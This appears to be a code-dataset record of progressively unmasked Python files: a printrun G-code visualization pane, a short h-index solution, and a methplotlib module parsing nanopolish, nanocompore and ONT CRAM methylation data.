ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-3": "<mask token>\n\n\nclass NoViz:\n <mask token>\n\n def clear(self, *a):\n pass\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-4": "import traceback\nimport logging\nimport wx\n\n\nclass NoViz:\n showall = False\n\n def clear(self, *a):\n pass\n\n def addfile_perlayer(self, gcode, showall=False):\n layer_idx = 0\n while layer_idx < len(gcode.all_layers):\n yield layer_idx\n layer_idx += 1\n yield None\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n\n def Refresh(self, *a):\n pass\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-5": "# This file is part of the printrun suite.\n#\n# printrun is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# printrun is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with printrun. If not, see <http://www.gnu.org/licenses/>.\n\nimport traceback\nimport logging\n\nimport wx\n\nclass NoViz:\n\n showall = False\n\n def clear(self, *a):\n pass\n\n def addfile_perlayer(self, gcode, showall = False):\n layer_idx = 0\n while layer_idx < len(gcode.all_layers):\n yield layer_idx\n layer_idx += 1\n yield None\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n\n def Refresh(self, *a):\n pass\n\n def setlayer(self, *a):\n pass\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel = None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel: parentpanel = root.panel\n if root.settings.mainviz == \"None\":\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == \"2D\"\n if root.settings.mainviz == \"3D\":\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel, root.build_dimensions_list, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\"3D view mode requested, but we failed to initialize it.\\n\"\n + \"Falling back to 2D view, and here is the backtrace:\\n\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300),\n build_dimensions = root.build_dimensions_list,\n grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width = root.settings.preview_extrusion_width,\n bgcolor = root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\"Click to examine / edit\\n layers of loaded file\")))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.ID_ANY, 'Gcode view, shift to move view, mousewheel to set layer', size = (600, 600), build_dimensions = root.build_dimensions_list, objects = objects, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\"3D view mode requested, but we failed to initialize it.\\n\"\n + \"Falling back to 2D view, and here is the backtrace:\\n\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions = root.build_dimensions_list,\n grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width = root.settings.preview_extrusion_width,\n bgcolor = root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag = wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL)\n",
"step-ids": [
9,
10,
11,
15,
16
]
}
|
[
9,
10,
11,
15,
16
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def solution(citations):
citations.sort()
for i in range(len(citations)):
if citations[i] >= len(citations) - i:
return len(citations) - i
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def solution(citations):
citations.sort()
for i in range(len(citations)):
if citations[i] >= len(citations) - i:
return len(citations) - i
print(solution([3, 0, 6, 1, 5]))
<|reserved_special_token_1|>
def solution(citations):
# 사이테이션을 정렬
citations.sort()
#
for i in range(len(citations)):
if citations[i] >= len(citations) - i:
return len(citations)-i
print(solution([3,0,6,1,5]))
|
flexible
|
{
"blob_id": "0b3d6339faf9d66d4e1338599e4784fac0f63d3f",
"index": 5310,
"step-1": "<mask token>\n",
"step-2": "def solution(citations):\n citations.sort()\n for i in range(len(citations)):\n if citations[i] >= len(citations) - i:\n return len(citations) - i\n\n\n<mask token>\n",
"step-3": "def solution(citations):\n citations.sort()\n for i in range(len(citations)):\n if citations[i] >= len(citations) - i:\n return len(citations) - i\n\n\nprint(solution([3, 0, 6, 1, 5]))\n",
"step-4": "def solution(citations):\n # 사이테이션을 정렬\n citations.sort()\n # \n for i in range(len(citations)):\n if citations[i] >= len(citations) - i: \n return len(citations)-i \n\n\nprint(solution([3,0,6,1,5]))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import pandas as pd
import pyranges as pr
import numpy as np
import sys
import logging
from methplotlib.utils import file_sniffer
import pysam
class Methylation(object):
def __init__(self, table, data_type, name, called_sites):
self.table = table
self.data_type = data_type
self.name = name
self.called_sites = called_sites
def read_meth(filename, name, window, smoothen=5):
"""
converts a file from nanopolish to a pandas dataframe
input can be from calculate_methylation_frequency
which will return a dataframe with 'chromosome', 'pos', 'methylated_frequency'
smoothening the result by a rolling average
input can also be raw data per read, optionally phased
which will return a dataframe with 'read', 'chromosome', 'pos', 'log_lik_ratio', 'strand'
"""
file_type = file_sniffer(filename)
logging.info("File is of type {}".format(file_type))
try:
if file_type.startswith("nanopolish"):
return parse_nanopolish(filename, file_type, name, window, smoothen=smoothen)
elif file_type == "nanocompore":
return parse_nanocompore(filename, name, window)
elif file_type == "ont-cram":
return parse_ont_cram(filename, name, window)
except Exception:
sys.stderr.write("\n\n\nInput file {} not recognized!\n".format(filename))
sys.stderr.write("\n\n\nDetailed error:\n")
raise
def parse_nanopolish(filename, file_type, name, window, smoothen=5):
table = pd.read_csv(filename, sep="\t")
gr = pr.PyRanges(table.rename(columns={"start": "Start", "chromosome": "Chromosome",
"end": "End", "Strand": "strand"}))
logging.info("Read the file in a dataframe.")
if window:
gr = gr[window.chromosome, window.begin:window.end]
try:
gr.pos = np.floor(gr.drop().df[["Start", "End"]].mean(axis=1))
except KeyError:
sys.stderr.write("\n\n\nProblem parsing nanopolish file {}!\n".format(filename))
sys.stderr.write("Could it be that there are no calls in your selected window?\n")
sys.stderr.write("\n\n\nDetailed error:\n")
raise
table = gr.df
if file_type in ['nanopolish_call', 'nanopolish_phased']:
table = table.drop(columns=['Start', 'End', 'log_lik_methylated',
'log_lik_unmethylated', 'num_calling_strands',
'num_motifs', 'sequence'])
return Methylation(
table=table.sort_values(['read_name', 'pos']),
data_type=file_type,
name=name,
called_sites=len(table))
if file_type == "nanopolish_freq":
called_sites = table.called_sites
table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',
'called_sites', 'called_sites_methylated',
'group_sequence'])
return Methylation(
table=table.sort_values('pos')
.groupby('pos')
.mean()
.rolling(window=smoothen, center=True)
.mean(),
data_type=file_type,
name=name,
called_sites=called_sites.sum())
def parse_nanocompore(filename, name, window):
def nanocompore_columns_of_interest(column):
if column in ['pos', 'ref_id']:
return True
elif column.endswith('pvalue_context_2') or column.endswith('pvalue'):
return True
else:
return False
table = pd.read_csv(filename, sep="\t", usecols=nanocompore_columns_of_interest)
if window:
table = table[table["ref_id"] == window.chromosome]
return Methylation(
table=table.sort_values('pos')
.append({'pos': window.end}, ignore_index=True)
.drop(columns="ref_id")
.fillna(1.0),
data_type='nanocompore',
name=name,
called_sites=len(table))
def parse_ont_cram(filename, name, window):
cram = pysam.AlignmentFile(filename, "rc")
data = []
for read in cram.fetch(reference=window.chromosome, start=window.begin, end=window.end):
if not read.is_supplementary and not read.is_secondary:
mod, positions, quals = get_modified_reference_positions(read)
for pos, qual in zip(positions, quals):
if pos is not None:
data.append((read.query_name,
'-' if read.is_reverse else '+',
pos,
qual,
mod))
return Methylation(
table=pd.DataFrame(data, columns=['read_name', 'strand', 'pos', 'quality', 'mod'])
.astype(dtype={'mod': 'category', 'quality': 'float'})
.sort_values(['read_name', 'pos']),
data_type="ont-cram",
name=name,
called_sites=len(data))
def get_modified_reference_positions(read):
if read.has_tag('MM'):
basemod = read.get_tag('MM').split(',', 1)[0]
if '-' in basemod:
sys.exit("ERROR: modifications on negative strand currently unsupported.")
base, mod = basemod.split('+')
deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]
probabilities = phred_to_probability(read.get_tag('MP'))
locations = np.cumsum(deltas) + np.concatenate(
(np.zeros(shape=1),
np.ones(shape=len(deltas) - 1))).astype('int')
base_index = np.array(
[i for i, letter in enumerate(read.get_forward_sequence()) if letter == base]
)
modified_bases = base_index[locations]
refpos = np.array(read.get_reference_positions(full_length=True))
if read.is_reverse:
refpos = np.flipud(refpos)
probabilities = probabilities[::-1]
return (basemod, refpos[modified_bases], probabilities)
else:
return (None, [None], [None])
def errs_tab(n):
"""Generate list of error rates for qualities less than equal than n."""
return [10**(q / -10) for q in range(n + 1)]
def phred_to_probability(quals, tab=errs_tab(128)):
return [tab[ord(q) - 33] for q in quals]
def get_data(methylation_files, names, window, smoothen=5):
"""
Import methylation data from all files in the list methylation_files
Data can be either frequency or raw.
data is extracted within the window args.window
Frequencies are smoothened using a sliding window
"""
return [read_meth(f, n, window, smoothen) for f, n in zip(methylation_files, names)]
|
normal
|
{
"blob_id": "d654aea3da3e36ccde8a5f4e03798a0dea5aad8a",
"index": 510,
"step-1": "<mask token>\n\n\nclass Methylation(object):\n\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\n<mask token>\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep='\\t')\n gr = pr.PyRanges(table.rename(columns={'start': 'Start', 'chromosome':\n 'Chromosome', 'end': 'End', 'Strand': 'strand'}))\n logging.info('Read the file in a dataframe.')\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[['Start', 'End']].mean(axis=1))\n except KeyError:\n sys.stderr.write('\\n\\n\\nProblem parsing nanopolish file {}!\\n'.\n format(filename))\n sys.stderr.write(\n 'Could it be that there are no calls in your selected window?\\n')\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n table = gr.df\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n table = table.drop(columns=['Start', 'End', 'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands', 'num_motifs',\n 'sequence'])\n return Methylation(table=table.sort_values(['read_name', 'pos']),\n data_type=file_type, name=name, called_sites=len(table))\n if file_type == 'nanopolish_freq':\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated', 'group_sequence'])\n return Methylation(table=table.sort_values('pos').groupby('pos').\n mean().rolling(window=smoothen, center=True).mean(), data_type=\n file_type, name=name, called_sites=called_sites.sum())\n\n\n<mask token>\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\n 'ERROR: modifications on negative strand currently unsupported.'\n )\n base, mod = basemod.split('+')\n deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate((np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array([i for i, letter in enumerate(read.\n get_forward_sequence()) if letter == base])\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return basemod, refpos[modified_bases], probabilities\n else:\n return None, [None], [None]\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities less than equal than n.\"\"\"\n return [(10 ** (q / -10)) for q in range(n + 1)]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Methylation(object):\n\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\n<mask token>\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep='\\t')\n gr = pr.PyRanges(table.rename(columns={'start': 'Start', 'chromosome':\n 'Chromosome', 'end': 'End', 'Strand': 'strand'}))\n logging.info('Read the file in a dataframe.')\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[['Start', 'End']].mean(axis=1))\n except KeyError:\n sys.stderr.write('\\n\\n\\nProblem parsing nanopolish file {}!\\n'.\n format(filename))\n sys.stderr.write(\n 'Could it be that there are no calls in your selected window?\\n')\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n table = gr.df\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n table = table.drop(columns=['Start', 'End', 'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands', 'num_motifs',\n 'sequence'])\n return Methylation(table=table.sort_values(['read_name', 'pos']),\n data_type=file_type, name=name, called_sites=len(table))\n if file_type == 'nanopolish_freq':\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated', 'group_sequence'])\n return Methylation(table=table.sort_values('pos').groupby('pos').\n mean().rolling(window=smoothen, center=True).mean(), data_type=\n file_type, name=name, called_sites=called_sites.sum())\n\n\ndef parse_nanocompore(filename, name, window):\n\n def nanocompore_columns_of_interest(column):\n if column in ['pos', 'ref_id']:\n return True\n elif column.endswith('pvalue_context_2') or column.endswith('pvalue'):\n return True\n else:\n return False\n table = pd.read_csv(filename, sep='\\t', usecols=\n nanocompore_columns_of_interest)\n if window:\n table = table[table['ref_id'] == window.chromosome]\n return Methylation(table=table.sort_values('pos').append({'pos': window\n .end}, ignore_index=True).drop(columns='ref_id').fillna(1.0),\n data_type='nanocompore', name=name, called_sites=len(table))\n\n\ndef parse_ont_cram(filename, name, window):\n cram = pysam.AlignmentFile(filename, 'rc')\n data = []\n for read in cram.fetch(reference=window.chromosome, start=window.begin,\n end=window.end):\n if not read.is_supplementary and not read.is_secondary:\n mod, positions, quals = get_modified_reference_positions(read)\n for pos, qual in zip(positions, quals):\n if pos is not None:\n data.append((read.query_name, '-' if read.is_reverse else\n '+', pos, qual, mod))\n return Methylation(table=pd.DataFrame(data, columns=['read_name',\n 'strand', 'pos', 'quality', 'mod']).astype(dtype={'mod': 'category',\n 'quality': 'float'}).sort_values(['read_name', 'pos']), data_type=\n 'ont-cram', name=name, called_sites=len(data))\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\n 'ERROR: modifications on negative strand currently unsupported.'\n )\n base, mod = basemod.split('+')\n deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate((np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array([i for i, letter in enumerate(read.\n get_forward_sequence()) if letter == base])\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return basemod, refpos[modified_bases], probabilities\n else:\n return None, [None], [None]\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities less than equal than n.\"\"\"\n return [(10 ** (q / -10)) for q in range(n + 1)]\n\n\n<mask token>\n\n\ndef get_data(methylation_files, names, window, smoothen=5):\n \"\"\"\n Import methylation data from all files in the list methylation_files\n\n Data can be either frequency or raw.\n\n data is extracted within the window args.window\n Frequencies are smoothened using a sliding window\n \"\"\"\n return [read_meth(f, n, window, smoothen) for f, n in zip(\n methylation_files, names)]\n",
"step-3": "<mask token>\n\n\nclass Methylation(object):\n\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\ndef read_meth(filename, name, window, smoothen=5):\n \"\"\"\n converts a file from nanopolish to a pandas dataframe\n input can be from calculate_methylation_frequency\n which will return a dataframe with 'chromosome', 'pos', 'methylated_frequency'\n smoothening the result by a rolling average\n\n input can also be raw data per read, optionally phased\n which will return a dataframe with 'read', 'chromosome', 'pos', 'log_lik_ratio', 'strand'\n \"\"\"\n file_type = file_sniffer(filename)\n logging.info('File is of type {}'.format(file_type))\n try:\n if file_type.startswith('nanopolish'):\n return parse_nanopolish(filename, file_type, name, window,\n smoothen=smoothen)\n elif file_type == 'nanocompore':\n return parse_nanocompore(filename, name, window)\n elif file_type == 'ont-cram':\n return parse_ont_cram(filename, name, window)\n except Exception:\n sys.stderr.write('\\n\\n\\nInput file {} not recognized!\\n'.format(\n filename))\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep='\\t')\n gr = pr.PyRanges(table.rename(columns={'start': 'Start', 'chromosome':\n 'Chromosome', 'end': 'End', 'Strand': 'strand'}))\n logging.info('Read the file in a dataframe.')\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[['Start', 'End']].mean(axis=1))\n except KeyError:\n sys.stderr.write('\\n\\n\\nProblem parsing nanopolish file {}!\\n'.\n format(filename))\n sys.stderr.write(\n 'Could it be that there are no calls in your selected window?\\n')\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n table = gr.df\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n table = table.drop(columns=['Start', 'End', 'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands', 'num_motifs',\n 'sequence'])\n return Methylation(table=table.sort_values(['read_name', 'pos']),\n data_type=file_type, name=name, called_sites=len(table))\n if file_type == 'nanopolish_freq':\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated', 'group_sequence'])\n return Methylation(table=table.sort_values('pos').groupby('pos').\n mean().rolling(window=smoothen, center=True).mean(), data_type=\n file_type, name=name, called_sites=called_sites.sum())\n\n\ndef parse_nanocompore(filename, name, window):\n\n def nanocompore_columns_of_interest(column):\n if column in ['pos', 'ref_id']:\n return True\n elif column.endswith('pvalue_context_2') or column.endswith('pvalue'):\n return True\n else:\n return False\n table = pd.read_csv(filename, sep='\\t', usecols=\n nanocompore_columns_of_interest)\n if window:\n table = table[table['ref_id'] == window.chromosome]\n return Methylation(table=table.sort_values('pos').append({'pos': window\n .end}, ignore_index=True).drop(columns='ref_id').fillna(1.0),\n data_type='nanocompore', name=name, called_sites=len(table))\n\n\ndef parse_ont_cram(filename, name, window):\n cram = pysam.AlignmentFile(filename, 'rc')\n data = []\n for read in cram.fetch(reference=window.chromosome, start=window.begin,\n end=window.end):\n if not read.is_supplementary and not read.is_secondary:\n mod, positions, quals = get_modified_reference_positions(read)\n for pos, qual in zip(positions, quals):\n if pos is not None:\n data.append((read.query_name, '-' if read.is_reverse else\n '+', pos, qual, mod))\n return Methylation(table=pd.DataFrame(data, columns=['read_name',\n 'strand', 'pos', 'quality', 'mod']).astype(dtype={'mod': 'category',\n 'quality': 'float'}).sort_values(['read_name', 'pos']), data_type=\n 'ont-cram', name=name, called_sites=len(data))\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\n 'ERROR: modifications on negative strand currently unsupported.'\n )\n base, mod = basemod.split('+')\n deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate((np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array([i for i, letter in enumerate(read.\n get_forward_sequence()) if letter == base])\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return basemod, refpos[modified_bases], probabilities\n else:\n return None, [None], [None]\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities less than equal than n.\"\"\"\n return [(10 ** (q / -10)) for q in range(n + 1)]\n\n\ndef phred_to_probability(quals, tab=errs_tab(128)):\n return [tab[ord(q) - 33] for q in quals]\n\n\ndef get_data(methylation_files, names, window, smoothen=5):\n \"\"\"\n Import methylation data from all files in the list methylation_files\n\n Data can be either frequency or raw.\n\n data is extracted within the window args.window\n Frequencies are smoothened using a sliding window\n \"\"\"\n return [read_meth(f, n, window, smoothen) for f, n in zip(\n methylation_files, names)]\n",
"step-4": "import pandas as pd\nimport pyranges as pr\nimport numpy as np\nimport sys\nimport logging\nfrom methplotlib.utils import file_sniffer\nimport pysam\n\n\nclass Methylation(object):\n\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\ndef read_meth(filename, name, window, smoothen=5):\n \"\"\"\n converts a file from nanopolish to a pandas dataframe\n input can be from calculate_methylation_frequency\n which will return a dataframe with 'chromosome', 'pos', 'methylated_frequency'\n smoothening the result by a rolling average\n\n input can also be raw data per read, optionally phased\n which will return a dataframe with 'read', 'chromosome', 'pos', 'log_lik_ratio', 'strand'\n \"\"\"\n file_type = file_sniffer(filename)\n logging.info('File is of type {}'.format(file_type))\n try:\n if file_type.startswith('nanopolish'):\n return parse_nanopolish(filename, file_type, name, window,\n smoothen=smoothen)\n elif file_type == 'nanocompore':\n return parse_nanocompore(filename, name, window)\n elif file_type == 'ont-cram':\n return parse_ont_cram(filename, name, window)\n except Exception:\n sys.stderr.write('\\n\\n\\nInput file {} not recognized!\\n'.format(\n filename))\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep='\\t')\n gr = pr.PyRanges(table.rename(columns={'start': 'Start', 'chromosome':\n 'Chromosome', 'end': 'End', 'Strand': 'strand'}))\n logging.info('Read the file in a dataframe.')\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[['Start', 'End']].mean(axis=1))\n except KeyError:\n sys.stderr.write('\\n\\n\\nProblem parsing nanopolish file {}!\\n'.\n format(filename))\n sys.stderr.write(\n 'Could it be that there are no calls in your selected window?\\n')\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n table = gr.df\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n table = table.drop(columns=['Start', 'End', 